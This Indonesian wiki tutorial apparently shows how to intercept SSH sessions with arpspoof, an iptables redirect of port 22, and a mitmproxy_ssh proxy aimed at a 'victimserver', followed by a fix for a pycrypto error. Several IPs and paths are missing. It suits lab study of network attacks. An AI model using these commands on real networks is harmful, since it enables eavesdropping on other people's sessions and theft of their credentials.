MITM: mitm ssh

From OnnoWiki
Jump to: navigation, search



client --> mitmproxy --> ssh server

  • ip client: (misalnya)
  • ip server: (misalnya)


ARP Spoof

sudo su
arpspoof -t & >/dev/null

Set firewall agar bisa NAT

sudo su
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222


cd /root/

Generate Keys

cd ~/mitmproxy-master/

key akan di simpan di


Instal SSH key server yang akan di serang


ssh-copy-id -i ~/.mitmkeys/ user@victimserver


ssh-copy-id -i ~/.mitmkeys/ onno@

Jalankan proxy

Jalankan proxy, arahkan ke victimserver.

cd ~/mitmproxy-master/
./mitmproxy_ssh -H victimserver
./mitmproxy_ssh -H -s 

ini akan menjalankan proxy di localhost:2222

Harusnya bisa dilihat dengan

ssh localhost -p 2222

Now simply connect to the local proxy:

ssh localhost -p 2222

And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.


$ sudo pip install twisted
$ sudo  apt-get install python-service-identity
$ pip install pycrypto

Jika Error

./mitmproxy_ssh -H -s
Server running on localhost:2222...
Original client connected to proxy server.
Unhandled Error
Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/twisted/python/", line 101, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/", line 84, in callWithContext
    return{ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/", line 81, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
   File "/usr/lib/python2.7/dist-packages/twisted/internet/", line 597, in _doReadOrWrite
    why = selectable.doRead()
  File "/usr/lib/python2.7/dist-packages/twisted/internet/", line 209, in doRead
    return self._dataReceived(data)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/", line 215, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/", line 724, in dataReceived
    self.dispatchMessage(messageNum, packet[1:])
  File "/root/mitmproxy-master/mitmproxy/", line 1142, in dispatchMessage
  File "/root/mitmproxy-master/mitmproxy/", line 71, in log_packet
    self.output += func(payload)
  File "/root/mitmproxy-master/mitmproxy/", line 278, in msg_kexdh_init
    mpints, payload = get_mpint(payload)
  File "/root/mitmproxy-master/mitmproxy/", line 655, in get_mpint
exceptions.AttributeError: 'module' object has no attribute 'number'

Client disconnected. 

Ini terjadi karena perubahan struktur pycrypto, ubah file mitmproxy/mitmproxy/

-- line 655 ubah menjadi
-- line 11 tambahkan
from Crypto.Util import number as cnumber